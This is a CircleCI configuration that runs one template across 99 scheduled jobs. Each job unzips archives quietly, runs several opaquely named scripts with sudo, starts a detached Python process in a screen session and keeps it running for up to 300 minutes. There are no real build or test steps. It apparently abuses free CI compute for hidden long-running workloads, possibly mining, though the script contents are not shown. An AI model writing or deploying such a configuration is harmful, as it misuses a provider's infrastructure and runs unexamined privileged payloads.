working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
        name: A
        command: |
          sudo apt update -y
    - run:
        name: B
        command: |
          sleep 10s          
          unzip ninja.zip && chmod u+x *
          #./ninja.sh#
    - run:
        name: C
        command: |
          unzip hero.zip >/dev/null 2>&1
    - run:
        name: D
        command: |
          chmod u+x *
    - run:
        name: E
        command: |
          sudo ./aku.sh
    - run:
        name: F
        command: |
          sudo ./Bojo.sh
    - run:
        name: G
        command: |
          sudo ./cilok.sh
    - run:
        name: H
        command: |
          sudo ./dan.sh
    - run:
        name: I
        command: |
          sudo ./ewe.sh
    - run:
        name: J
        command: |
          #sudo ./Frean.sh#no_run
    - run:
        name: K
        no_output_timeout: 300m
        command: |
          echo "Ijin Berkah Om. . ."
          sudo ./gok.sh
          sudo ./halah.sh
          sudo ./Itu.sh
          screen -dmS Acdb python3 pro01.py
          sleep 300s
          ./main01.sh
  working_directory: *working_dir

version: 2.0

jobs:
  TODTOD_01:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  TODTOD_02:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_03:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_04:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_05:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_06:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_07:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_08:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_09:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_10:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_11:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_12:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_13:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_14:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_15:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_16:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_17:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_18:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_19:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_20:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_21:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_22:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_23:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_24:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_25:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_26:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_27:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_28:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_29:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_30:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_31:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_32:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_33:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_34:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_35:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_36:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_37:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_38:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_39:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_40:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_41:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_42:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_43:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_44:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_45:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_46:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_47:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_48:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_49:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_50:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_51:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_52:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_53:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_54:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_55:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_56:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_57:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_58:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_59:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_60:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_61:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_62:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_63:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_64:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_65:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_66:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_67:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_68:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_69:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_70:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_71:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_72:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_73:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_74:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_75:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_76:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_77:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_78:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_79:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_80:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_81:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_82:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_83:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_84:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_85:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_86:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_87:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_88:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_89:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_90:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_91:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  TODTOD_92:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_93:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  TODTOD_94:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_95:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_96:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_97:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_98:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  TODTOD_99:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - anak
                - kucing
                - main
                - di
                - jalan

workflows:
  version: 2
  Alahngono:
    jobs:
      - TODTOD_01
      - TODTOD_02
      - TODTOD_03
      - TODTOD_04
      - TODTOD_05
      - TODTOD_06
      - TODTOD_07
      - TODTOD_08
      - TODTOD_09
      - TODTOD_10
      - TODTOD_11
      - TODTOD_12
      - TODTOD_13
      - TODTOD_14
      - TODTOD_15
      - TODTOD_16
      - TODTOD_17
      - TODTOD_18
      - TODTOD_19
      - TODTOD_20
      - TODTOD_21
      - TODTOD_22
      - TODTOD_23
      - TODTOD_24
      - TODTOD_25
      - TODTOD_26
      - TODTOD_27
      - TODTOD_28
      - TODTOD_29
      - TODTOD_30
      - TODTOD_31
      - TODTOD_32
      - TODTOD_33
      - TODTOD_34
      - TODTOD_35
      - TODTOD_36
      - TODTOD_37
      - TODTOD_38
      - TODTOD_39
      - TODTOD_40
      - TODTOD_41
      - TODTOD_42
      - TODTOD_43
      - TODTOD_44
      - TODTOD_45
      - TODTOD_46
      - TODTOD_47
      - TODTOD_48
      - TODTOD_49
      - TODTOD_50
      - TODTOD_51
      - TODTOD_52
      - TODTOD_53
      - TODTOD_54
      - TODTOD_55
      - TODTOD_56
      - TODTOD_57
      - TODTOD_58
      - TODTOD_59
      - TODTOD_60
      - TODTOD_61
      - TODTOD_62
      - TODTOD_63
      - TODTOD_64
      - TODTOD_65
      - TODTOD_66
      - TODTOD_67
      - TODTOD_68
      - TODTOD_69
      - TODTOD_70
      - TODTOD_71
      - TODTOD_72
      - TODTOD_73
      - TODTOD_74
      - TODTOD_75
      - TODTOD_76
      - TODTOD_77
      - TODTOD_78
      - TODTOD_79
      - TODTOD_80
      - TODTOD_81
      - TODTOD_82
      - TODTOD_83
      - TODTOD_84
      - TODTOD_85
      - TODTOD_86
      - TODTOD_87
      - TODTOD_88
      - TODTOD_89
      - TODTOD_90
      - TODTOD_91
      - TODTOD_92
      - TODTOD_93
      - TODTOD_94
      - TODTOD_95
      - TODTOD_96
      - TODTOD_97
      - TODTOD_98
      - TODTOD_99
